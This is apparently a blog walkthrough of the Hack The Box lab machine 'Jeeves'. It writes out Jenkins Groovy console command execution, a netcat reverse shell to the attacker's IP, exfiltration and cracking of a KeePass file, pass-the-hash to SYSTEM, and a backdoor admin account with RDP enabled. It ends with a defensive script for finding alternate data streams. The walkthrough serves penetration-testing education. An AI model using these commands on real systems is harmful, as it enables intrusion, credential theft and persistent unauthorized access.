Okay. Now you can go spend the next few days learning how to program in Groovy. Fun! Seriously though, it’s just like Java, but easier. If you can Java, you can Groovy. This looks like a tender spot, so let’s try to get some code execution going. It’s Windows, so keep that in mind when you write out commands.

Groovy adds an execute() method to String that runs the string as an external process. Let’s use that to see if we can get a directory listing.

This took a little tinkering to get right, but we’ve got code execution.

Groovy Console:

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

Result:

 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\.jenkins

05/21/2018  12:42 AM    <DIR>          .
05/21/2018  12:42 AM    <DIR>          ..
05/24/2018  05:26 AM                47 .owner
05/21/2018  12:42 AM             1,684 config.xml
05/21/2018  12:42 AM               156 hudson.model.UpdateCenter.xml
11/03/2017  10:43 PM               374 hudson.plugins.git.GitTool.xml
11/03/2017  10:33 PM             1,712 identity.key.enc
11/03/2017  10:46 PM                94 jenkins.CLI.xml
05/24/2018  04:54 AM            83,489 jenkins.err.log
11/03/2017  10:47 PM           360,448 jenkins.exe
11/03/2017  10:47 PM               331 jenkins.exe.config
05/21/2018  12:42 AM                 4 jenkins.install.InstallUtil.lastExecVersion
11/03/2017  10:45 PM                 4 jenkins.install.UpgradeWizard.state
11/03/2017  10:46 PM               138 jenkins.model.DownloadSettings.xml
12/24/2017  03:38 PM             2,688 jenkins.out.log
05/21/2018  12:41 AM                 4 jenkins.pid
11/03/2017  10:46 PM               169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
11/03/2017  10:46 PM               162 jenkins.security.UpdateSiteWarningsConfiguration.xml
11/03/2017  10:47 PM        74,271,222 jenkins.war
05/21/2018  12:41 AM            34,147 jenkins.wrapper.log
11/03/2017  10:49 PM             2,881 jenkins.xml
11/03/2017  10:33 PM    <DIR>          jobs
11/03/2017  10:33 PM    <DIR>          logs
05/21/2018  12:42 AM               907 nodeMonitors.xml
11/03/2017  10:33 PM    <DIR>          nodes
11/03/2017  10:44 PM    <DIR>          plugins
11/03/2017  10:47 PM               129 queue.xml.bak
11/03/2017  10:33 PM                64 secret.key
11/03/2017  10:33 PM                 0 secret.key.not-so-secret
12/24/2017  03:47 AM    <DIR>          secrets
11/08/2017  09:52 AM    <DIR>          updates
11/03/2017  10:33 PM    <DIR>          userContent
11/03/2017  10:33 PM    <DIR>          users
11/03/2017  10:47 PM    <DIR>          war
11/03/2017  10:43 PM    <DIR>          workflow-libs
              23 File(s)     74,760,854 bytes
              12 Dir(s)   7,523,225,600 bytes free

Excellent.

Now I’d suggest taking a break. Sitting kills, people. Go make fried chicken or something.

Alright, we’re back from our commercial break.

Let’s get a reverse shell. Apparently Jeeves has PowerShell installed so that makes our job easier. Start up a web server on your local machine and put a copy of an nc.exe binary nearby where you won’t lose it.

Along with netcat, Kali has a bunch of other cool Windows binaries for penetration testing stuff in /usr/share/windows-binaries. Look through it when you get the chance. If you don’t have it on your machine, just find it on the internet. The Windows machine we’re targeting is 32-bit so make sure the binary you use is also 32-bit.

root@kali:~# ls -la /usr/share/windows-binaries/
total 1908
drwxr-xr-x   9 root root   4096 Feb  4 14:39 .
drwxr-xr-x 472 root root  20480 May 21 18:24 ..
drwxr-xr-x   2 root root   4096 Feb  4 14:39 backdoors
drwxr-xr-x   2 root root   4096 Feb  4 14:39 enumplus
-rwxr-xr-x   1 root root  53248 Aug 21  2017 exe2bat.exe
drwxr-xr-x   2 root root   4096 Feb  4 14:39 fgdump
drwxr-xr-x   2 root root   4096 Feb  4 14:39 fport
drwxr-xr-x   5 root root   4096 Feb  4 14:39 hyperion
-rwxr-xr-x   1 root root  23552 Aug 21  2017 klogger.exe
drwxr-xr-x   2 root root   4096 Feb  4 14:39 mbenum
drwxr-xr-x   4 root root   4096 Feb  4 14:39 nbtenum
-rwxr-xr-x   1 root root  59392 Aug 21  2017 nc.exe            //YEE
-rwxr-xr-x   1 root root 311296 Aug 21  2017 plink.exe
-rwxr-xr-x   1 root root 704512 Aug 21  2017 radmin.exe
-rwxr-xr-x   1 root root 364544 Aug 21  2017 vncviewer.exe
-rwxr-xr-x   1 root root 308736 Aug 21  2017 wget.exe
-rwxr-xr-x   1 root root  66560 Aug 21  2017 whoami.exe

root@kali:~/Documents/oscp/tools/windows_binaries# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

Windows doesn’t ship netcat, and where it exists it’s usually locked down, so it’s far easier to upload our own copy and make TCP connections to our heart’s content.

Back to the Groovy script console. Use the PowerShell Invoke-WebRequest cmdlet (wget is so much less verbose, jeez) to fetch netcat from your local machine.

Groovy Console:

Make sure to use your own IP address, the one on the tun0 interface (viewable with ifconfig). The -OutFile parameter is needed to save the response body to nc.exe, because Invoke-WebRequest otherwise returns the content as an object on the pipeline. Your Python server should show that Jeeves picked up our present.

root@kali:~# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.63 - - [24/May/2018 01:07:41] "GET /nc.exe HTTP/1.1" 200 -

List the directory contents again to make sure it’s there. We can keep using PowerShell because we want to avoid the aging travesty that is the Windows command line.

Groovy Console:

def process = "powershell -command dir".execute();
println("${process.text}");

Result:

    Directory: C:\Users\Administrator\.jenkins


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/3/2017  10:33 PM                jobs
d-----       11/3/2017  10:33 PM                logs
d-----       11/3/2017  10:33 PM                nodes
d-----       11/3/2017  10:44 PM                plugins
d-----      12/24/2017   2:47 AM                secrets
d-----       11/8/2017   8:52 AM                updates
d-----       11/3/2017  10:33 PM                userContent
d-----       11/3/2017  10:33 PM                users
d-----       11/3/2017  10:47 PM                war
d-----       11/3/2017  10:43 PM                workflow-libs
-a----       5/24/2018   5:26 AM             47 .owner
-a----       5/21/2018  12:42 AM           1684 config.xml
-a----       5/21/2018  12:42 AM            156 hudson.model.UpdateCenter.xml
-a----       11/3/2017  10:43 PM            374 hudson.plugins.git.GitTool.xml
-a----       11/3/2017  10:33 PM           1712 identity.key.enc
-a----       11/3/2017  10:46 PM             94 jenkins.CLI.xml
             5/24/2018   4:54 AM          83489 jenkins.err.log
-a----       11/3/2017  10:47 PM         360448 jenkins.exe
-a----       11/3/2017  10:47 PM            331 jenkins.exe.config
-a----       5/21/2018  12:42 AM              4 jenkins.install.InstallUtil.lastExecVersion
-a----       11/3/2017  10:45 PM              4 jenkins.install.UpgradeWizard.state
-a----       11/3/2017  10:46 PM            138 jenkins.model.DownloadSettings.xml
            12/24/2017   2:38 PM           2688 jenkins.out.log
-a----       5/21/2018  12:41 AM              4 jenkins.pid
-a----       11/3/2017  10:46 PM            169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
-a----       11/3/2017  10:46 PM            162 jenkins.security.UpdateSiteWarningsConfiguration.xml
-a----       11/3/2017  10:47 PM       74271222 jenkins.war
-a----       5/21/2018  12:41 AM          34147 jenkins.wrapper.log
-a----       11/3/2017  10:49 PM           2881 jenkins.xml
-a----       5/24/2018   6:06 AM          59392 nc.exe
-a----       5/21/2018  12:42 AM            907 nodeMonitors.xml
-a----       11/3/2017  10:47 PM            129 queue.xml.bak
-a----       11/3/2017  10:33 PM             64 secret.key
-a----       11/3/2017  10:33 PM              0 secret.key.not-so-secret

Great. Now let’s set up a netcat listener on our local machine and connect back to it from the script console.

root@kali:~# nc -lnvp 1337
listening on [any] 1337 ...

Groovy Console:

def process = "powershell -command ./nc.exe 10.10.14.5 1337 -e cmd.exe".execute(); //CHANGE IP PLS
println("${process.text}");

Run it and check your listener.

root@kali:~# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49678
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke

C:\Users\Administrator\.jenkins>

Delicious.

Windows irks me

Start off by invading Kohsuke’s privacy and rifling through his stuff. His Documents folder contains something interesting.

C:\Users\kohsuke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\kohsuke\Documents

11/03/2017  11:18 PM    <DIR>          .
11/03/2017  11:18 PM    <DIR>          ..
09/18/2017  01:43 PM             2,846 CEH.kdbx
               1 File(s)          2,846 bytes
               2 Dir(s)   7,523,155,968 bytes free

C:\Users\kohsuke\Documents>

A quick Google (sigh) search shows that the .kdbx extension is the KeePass password database format. Nice. It’s probably got some interesting credentials in there. Let’s get it onto our system with some netcat file transfer witchery.

Set up a listener on your local machine that redirects data to a .kdbx file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx

listening on [any] 4444 ...

Now on the command line for Jeeves, use the uploaded nc.exe to transfer the contents of CEH.kdbx to your machine.

C:\Users\kohsuke\Documents>C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx
C:\Users\Administrator\.jenkins\nc.exe 10.10.14.5 4444 < CEH.kdbx

Your listener should have received the incoming connection. If so, exit netcat and you’ll see the file.

root@kali:~# nc -lnvp 4444 > CEH.kdbx
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49693
^C
root@kali:~# ls -la CEH.kdbx
-rw-r--r-- 1 root root 2846 May 23 02:08 CEH.kdbx
root@kali:~#

Great. Download KeePass if you don’t already have it.

root@kali:~# apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
  Password manager

keepass2-doc/kali-rolling 2.38+dfsg-1 all
  Password manager - Documentation

keepassx/kali-rolling,now 2.0.3-1 i386 [installed]
  Cross Platform Password Manager

keepassxc/kali-rolling 2.3.1+dfsg.1-1 i386
  Cross Platform Password Manager

kpcli/kali-rolling 3.1-3 all
  command line interface to KeePassX password manager databases

libfile-keepass-perl/kali-rolling 2.03-1 all
  interface to KeePass V1 and V2 database files

root@kali:~# apt install keepassx
...

Open the KeePass file.

root@kali:~/Documents/hack_the_box/jeeves# keepassx CEH.kdbx

We shall not pass. We need a password. Let’s smash it.

Luckily Kali saves our asses once again (I laughed when I saw there’s a keepass2john program. I love this).

root@kali:~# keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
root@kali:~#

Alright. We now have a hash. Save it to a text file and point hashcat at it. You’ll notice hashcat rejects the line as an invalid hash. Check hashcat’s list of example hashes and you’ll see that KeePass hashes start with $keepass$, not with CEH: (kind of obvious in hindsight: that prefix is just the database name keepass2john prepends). Remove that part. Now actually crack it.

*5 minutes later*

Nvm. It broke my laptop. Pro tip, don’t use the force option when hashcat tells you it’s a bad idea. My Kali Linux partition is no longer booting.

Sigh. Sorry John. I still love you and stuff. Take me back, pls.

root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt keepass-hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/32 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)
1g 0:00:01:37 DONE (2018-05-26 03:38) 0.01027g/s 564.7p/s 564.7c/s 564.7C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~#

Aaaand the password is moonshine1. Fire up KeePass again and enter the password.

WOOH, got the password to his Walmart account. I kinda needed a few bags of potting soil and 4-ply toilet paper.

Let’s use winexe to try to log in as admin with all these passwords.

The most promising seems like the one under Backup stuff, which looks like a Windows NTLM hash.

For this, we can use pth-winexe to pass in the hash directly to log in. No need to crack it. Scary stuff.

root@kali:~# pth-winexe
winexe version 1.1
This program may be freely redistributed under the terms of the GNU GPLv3
Usage: winexe [OPTION]... //HOST COMMAND
Options:
  -h, --help                               Display help message
  -V, --version                            Display version number
  -U, --user=[DOMAIN/]USERNAME[%PASSWORD]  Set the network username
  -A, --authentication-file=FILE           Get the credentials from a file
  -N, --no-pass                            Do not ask for a password
  -k, --kerberos=STRING                    Use Kerberos, -k [yes|no]
  -d, --debuglevel=DEBUGLEVEL              Set debug level
  --uninstall                              Uninstall winexe service after remote execution
  --reinstall                              Reinstall winexe service before remote execution
  --system                                 Use SYSTEM account
  --profile                                Load user profile
  --convert                                Try to convert characters between local and remote code-pages
  --runas=[DOMAIN\]USERNAME%PASSWORD       Run as the given user (BEWARE: this password is sent in cleartext over the network!)
  --runas-file=FILE                        Run as user options defined in a file
  --interactive=0|1                        Desktop interaction: 0 - disallow, 1 - allow. If allow, also use the --system switch (Windows requirement). Vista does not support this option.
  --ostype=0|1|2                           OS type: 0 - 32-bit, 1 - 64-bit, 2 - winexe will decide. Determines which version (32-bit or 64-bit) of service will be installed.

root@kali:~# pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system                <------------ yah

C:\Windows\system32>

Successfully hacked. Now let’s grab the flags the fun way. I had no idea this was a thing until I started my OSCP practice. Mind was sufficiently blown.

Through the Jeeves command line, make an account for yourself with admin privileges (Please don’t do this in a real environment. Use already existing accounts if you have to. And opening up a remote desktop port is pretty conspicuous. It’s just more fun this way).

C:\Windows\system32>net user /add oneeb jeeved
net user /add oneeb jeeved
The command completed successfully.

C:\Windows\system32>net localgroup administrators oneeb /add
net localgroup administrators oneeb /add
The command completed successfully.

C:\Windows\system32>

Now enable Remote Desktop (RDP) by flipping the fDenyTSConnections registry value to 0.

C:\Windows\system32>reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
The operation completed successfully.

C:\Windows\system32>

Configure the firewall to let RDP connections in.

C:\Windows\system32>netsh firewall set service remoteadmin enable
netsh firewall set service remoteadmin enable
Ok.

C:\Windows\system32>netsh firewall set service remotedesktop enable
netsh firewall set service remotedesktop enable
Ok.

C:\Windows\system32>

Now use rdesktop on Kali to log in to your newly minted account.

root@kali:~# rdesktop 10.10.10.63
Connection established using SSL.

Enter your username and password and log in.

The color scheme makes me sad

Tah-dah. Beautiful isn’t it? Play around with it to your heart’s content.

Now go to the admin desktop and grab that flag so I can sleep.

Copy that file to your desktop so you can read it.

Knickers twisted. I’m stumped. Since the root.txt file is always on the Administrator desktop, and there doesn’t seem to be some network inception stuff going on, let’s take a deeper look at the file with PowerShell. Make sure to run it as admin or you're going to have a bad time.

I can use ls again.

Start by taking a look at Alternate Data Streams (ADS). Malwarebytes has a good basic introduction to them.

Basically, an ADS lets extra data be attached to a file without showing up in the usual views: File Explorer, a plain dir listing, or typing the file out on the command line. You have to use special switches or cmdlets to see the streams, which is why they fly under the radar so easily. They have a bad reputation because a lot of malware uses them to hide payloads.

Note that these streams are a feature of the Windows NT File System (NTFS), so copying the file to your Linux box, or even to a FAT32 volume on Windows, will drop any streams the file has.

Anyway, let’s check to see if hm.txt has any other streams.

Bingo. Read the contents of root.txt.

PS C:\Users\oneeb\Desktop> get-content .\hm.txt -stream root.txt
r00t_ha$h_th1ngi3
PS C:\Users\oneeb\Desktop>
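Reading a stream you already know the name of is the easy part; the useful skill, whether you are hunting a flag or hunting malware, is finding the streams you did not know about. The function below is an added example, not code from the original post: it walks a directory tree and reports every stream other than the default :$DATA stream, flagging the ones that are normal to see (Zone.Identifier, the mark-of-the-web stream browsers add to downloads) so the surprises stand out. The Desktop path in the usage line is an assumption; point it wherever you want to look.

```powershell
# Added example (not from the original post): list alternate data streams
# under a directory, separating expected streams from unexpected ones.
function Find-AlternateStreams {
    param(
        [Parameter(Mandatory)][string]$Root,
        # Stream names that are normal on a workstation (assumed list, extend as needed).
        [string[]]$KnownStreams = @('Zone.Identifier')
    )

    # -Force includes hidden and system files, which is where hidden data tends to live.
    Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns one FileStreamInfo object per stream on the file;
            # ':$DATA' is the ordinary content that dir and Explorer show you.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                        Known  = ($KnownStreams -contains $_.Stream)
                    }
                }
        }
}

# Usage: every non-default stream below the Desktop, unknown ones listed first.
# Path is an assumption; substitute the tree you want to inspect.
Find-AlternateStreams -Root "$env:USERPROFILE\Desktop" |
    Sort-Object Known, File |
    Format-Table -AutoSize
```

Once a stream is located, Get-Content -Stream reads it exactly as the post does above, Remove-Item -Stream deletes it, and dir /r shows the same information from cmd. For forensic work, keep copies on NTFS (or use an imaging tool that preserves streams), since the FAT32/Linux caveat from earlier means a casual copy silently loses the evidence.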

Done.

Just make sure to delete your user account so Jeeves doesn’t axe murder you. Nighty night.